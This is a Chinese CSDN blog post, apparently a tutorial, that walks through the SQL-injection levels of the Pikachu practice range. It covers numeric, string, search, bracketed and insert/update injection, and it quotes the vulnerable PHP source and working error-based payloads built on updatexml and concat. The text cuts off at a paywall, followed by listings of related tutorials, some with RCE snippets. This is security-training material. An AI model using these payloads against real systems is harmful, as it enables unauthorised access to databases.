pikachu通关教程(SQL-inject)

最新推荐文章于 2024-07-23 16:52:49 发布
最新推荐文章于 2024-07-23 16:52:49 发布
阅读量1k 收藏 2
点赞数
分类专栏: pikachu通关教程 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/121808700
版权
本文详细介绍了SQL注入的各种类型,包括数字型、字符型、搜索型、xx型、insert/update、delete注入以及HTTP头注入。通过实际操作展示了如何利用报错注入和布尔型、时间型盲注来探测数据库信息。此外,还提到了宽字节注入的问题及应对策略。
摘要由CSDN通过智能技术生成

数字型注入

虽然题目已经说了是数字型,但我还是以什么都不知道的状态去进行检测
检测是否为字符型
抓包,改包3’ # 这里表示闭合前后单引号,如果是数字型这里会报错
在这里插入图片描述
报错,得了是数字型,也可以看出这里可以使用报错注入
在这里插入图片描述
能使用报错注入,绝不使用联合查询注入
在这里插入图片描述
成功显示错误描述
在这里插入图片描述

字符型注入

先检测是否字符型
没报错证明是字符型
在这里插入图片描述
那么进行字符型的报错注入
’ or updatexml(1,concat(0x7e,database()),1)#
在这里插入图片描述

搜索型注入

搜索型源码一般是 select … from … like ‘%xxx%’ xxx是我们输入的值
尝试输入% (通配符表示所有)
在这里插入图片描述
跟字符型差不多,闭合前后单引号,这里用and是因为’%'能查到数据
输入
’ and updatexml(1,concat(0x7e,database()),1)#
在这里插入图片描述

where 或 like ,第一个条件为true,使用and;为false,则使用or

xx型注入

源码

$query="select id,email from member where username=('$name')";

用括号和引号把变量框起来了,我们拼接sql语句时也要闭合括号,引号
') or updatexml(1,concat(0x7e,database()),1)#
在这里插入图片描述

insert/update注入

源码

if($_POST['username']!=null &&$_POST['password']!=null){
   
//没转义,导致注入漏洞,操作类型为insert
$getdata=$_POST;
$query="insert into member(username,pw,sex,phonenum,email,address) values('{
     $getdata['username']}',md5('{
     $getdata['password']}'),'{
     $getdata['sex']}','{
     $getdata['phonenum']}','{
     $getdata['email']}','{
     $getdata['add']}')";
$result=execute($link, $query);

insert/update目前只用过报错注入,联合查询这里行不通,没有回显
这里先看insert注入,源码可以看到密码进行md5hash,所以sql语句无效,所以只能从其他字段进行注入
输入
’ or updatexml(1,concat(0x7e,database()),1) or ’
前后单引号为了闭合values中的单引号,这里不能用#注释后面的内容,因为需要插入的字段不是一个
在这里插入图片描述

在这里插入图片描述
再看update注入
先注册一个账号
在这里插入图片描述

最低0.47元/天 解锁文章
活着Viva
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu通关教程(Over Permission)
Bu2n的博客
12-13 954
越权漏洞水平越权垂直越权 水平越权 这里有三个用户 登录lucy的 查看源码 if(isset($_GET['submit']) && $_GET['username']!=null){ //没有使用session来校验,而是使用的传进来的值,权限校验出现问题,这里应该跟登录态关系进行绑定 $username=escape($link, $_GET['username']); $query="select * from member where username
pikachu通关教程
小宇的web博客
04-29 8294
pikachu通关教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包。 直接找到一组账号和密码 验证码绕过(on server) 先进行抓包查看抓包的数据 这里发现验证码是不会发生改变的所以不用在意验证码,直接进行爆破即可 验证码绕过(on client) 这个验证码是通过前端的JavaScript来进行了验证码的验证,这里一些不懂技术的人可以被防治,但是懂技术人都懂在前端的验证码都是无效的 这里通过bp来进行前端代码修改来进行验证码的
【网络安全零基础入门必看】渗透测试之pikachu&DVWA靶场搭建教程,零基础入门到精通,收藏这一篇就够了
最新发布
2301_77472496的博客
07-23 1259
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习,下面和我一起搭建5个比较常用的初学者入门靶场。
pikachu通关教程~~~~
m0_57349349的博客
08-03 3160
暴力破解 基于表单的暴力破解 1.拦截包发送到intruder 设置playload 判断长度得到账号密码 登录成功 2.验证码绕过(on sever) 输入正确验证码之后 在BURP上发送给intruder配置payload 得到密码 3.基于client端的验证码绕过(on client) 输入正确验证码 用burp拦截 放包 得到响应报文 编辑 把false改成true 得到的新的响应报文再放包 现在随便输入账号密...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2707
Pikachu-----Sql Inject(SQL注入
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5239
Pikachu靶场–Sql
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
kali Linux安装流程;SQL-Inject漏洞实验模拟
qq_44696653的博客
03-29 452
Kali Linux安装具体流程 前往VMware官网下载VMware虚拟机。 在kali官方网站下载所要用到的镜像文件。因为是在VMware虚拟机中使用,所以我们可以选择下载虚拟机的版本 下载完成后将相关压缩文件进行解压缩处理。打开VMware虚拟机点击文件打开,根据kali下载下来时的下载目录找到相关数据包进行读取安装。 提示:虚拟机版本的是直接导入的不需要安装,默认的root用户密码是:to...
PiKachuSql Inject (SQL注入)
angry_program的博客
02-20 1026
概述 SQL注入漏洞,可怕的漏洞。 在OWASP发布的Top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱...
Pikachu靶场通关教程
npc88888的博客
04-17 2012
账号:admin 密码:123456爆破代码。
pikachu通关教程(RCE)
Bu2n的博客
12-10 774
RCE常用命令连接符exec "ping"exec "eval" 常用命令连接符 |、||、&、&& 一般使用最多就是& ,因为无论前面命令执行成不成功,都得执行后面的命令 exec “ping” 输入 12 & whoami exec “eval” 源码 $html=''; if(isset($_POST['submit']) && $_POST['txt'] != null){ if(@!eval($_POST['txt'])){
pikachu通关教程(XSS)
Bu2n的博客
12-07 1572
pikachu通关教程通关详解超详细
Innocence_0的博客
04-12 1105
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
pikachu通关教程(File include)
Bu2n的博客
12-11 530
文件包含本地文件包含远程文件包含 本地文件包含 随便选一个选项,可以看到url提交的参数存在文件名 随便输入值,还会爆出当前路径 源码 $html=''; if(isset($_GET['submit']) && $_GET['filename']!=null){ $filename=$_GET['filename']; include "include/$filename";//变量传进来直接包含,没做任何的安全限制 // //安全的写法,使用白名单,严格指定包
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1709
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值